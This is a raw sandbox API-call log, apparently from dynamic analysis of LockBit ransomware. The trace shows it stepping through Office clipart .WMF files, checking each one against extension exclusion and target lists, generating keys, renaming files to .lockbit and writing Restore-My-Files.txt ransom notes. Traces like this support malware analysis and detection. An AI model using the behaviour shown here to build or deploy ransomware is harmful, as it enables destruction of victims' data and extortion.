[0117.701] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.701] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.701] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.lockbit") returned 72 [0117.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0117.702] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.702] malloc (_Size=0x40068) returned 0x3ef0008 [0117.702] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1960) returned 1 [0117.702] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0117.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0117.703] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.708] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.708] malloc (_Size=0xa6) returned 0x77d7a8 [0117.708] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.709] free (_Block=0x77d7a8) [0117.709] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.709] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.709] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.709] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1461c00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5386f090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa1461c00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xe4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00260_.WMF", cAlternateFileName="")) returned 1 [0117.709] lstrcmpiW (lpString1=".", lpString2="HH00260_.WMF") returned -1 [0117.709] lstrcmpiW (lpString1="..", lpString2="HH00260_.WMF") returned -1 [0117.709] PathFindExtensionW (pszPath="HH00260_.WMF") returned=".WMF" [0117.709] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.709] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.709] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.709] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.709] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.709] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.709] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.709] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.710] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.711] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.711] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00260_.WMF") returned 1 [0117.712] lstrcmpiW (lpString1="ntldr", lpString2="HH00260_.WMF") returned 1 [0117.712] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00260_.WMF") returned 1 [0117.712] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00260_.WMF") returned -1 [0117.712] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00260_.WMF") returned -1 [0117.712] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00260_.WMF") returned 1 [0117.712] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00260_.WMF") returned 1 [0117.712] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.712] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned=".WMF" [0117.712] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.712] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.712] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.713] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.713] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.lockbit") returned 72 [0117.713] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0117.718] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.718] malloc (_Size=0x40068) returned 0x3d70450 [0117.719] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3662) returned 1 [0117.719] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.720] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0117.720] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.720] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0117.721] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.725] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.725] malloc (_Size=0xa6) returned 0x77d7a8 [0117.725] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.726] free (_Block=0x77d7a8) [0117.726] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.726] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.726] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.726] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa014ef00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5386f090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa014ef00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00276_.WMF", cAlternateFileName="")) returned 1 [0117.726] lstrcmpiW (lpString1=".", lpString2="HH00276_.WMF") returned -1 [0117.726] lstrcmpiW (lpString1="..", lpString2="HH00276_.WMF") returned -1 [0117.727] PathFindExtensionW (pszPath="HH00276_.WMF") returned=".WMF" [0117.727] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.727] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.728] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.728] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00276_.WMF") returned 1 [0117.729] lstrcmpiW (lpString1="ntldr", lpString2="HH00276_.WMF") returned 1 [0117.729] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00276_.WMF") returned 1 [0117.729] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00276_.WMF") returned -1 [0117.729] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00276_.WMF") returned -1 [0117.729] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00276_.WMF") returned 1 [0117.729] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00276_.WMF") returned 1 [0117.729] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.729] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned=".WMF" [0117.729] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.729] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.729] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.730] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.731] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.731] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.731] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.731] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.731] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.731] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.731] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.lockbit") returned 72 [0117.731] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0117.732] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.732] malloc (_Size=0x40068) returned 0x1ff1e60 [0117.732] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3016) returned 1 [0117.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0117.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0117.733] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.746] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.746] malloc (_Size=0xa6) returned 0x77d7a8 [0117.746] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.747] free (_Block=0x77d7a8) [0117.747] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.747] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.748] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.748] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10883400, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10883400, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00334_.WMF", cAlternateFileName="")) returned 1 [0117.748] lstrcmpiW (lpString1=".", lpString2="HH00334_.WMF") returned -1 [0117.748] lstrcmpiW (lpString1="..", lpString2="HH00334_.WMF") returned -1 [0117.748] PathFindExtensionW (pszPath="HH00334_.WMF") returned=".WMF" [0117.748] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.748] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.748] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.748] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.748] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.748] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.748] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.748] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.749] lstrcmpiW (lpString1=".bin", 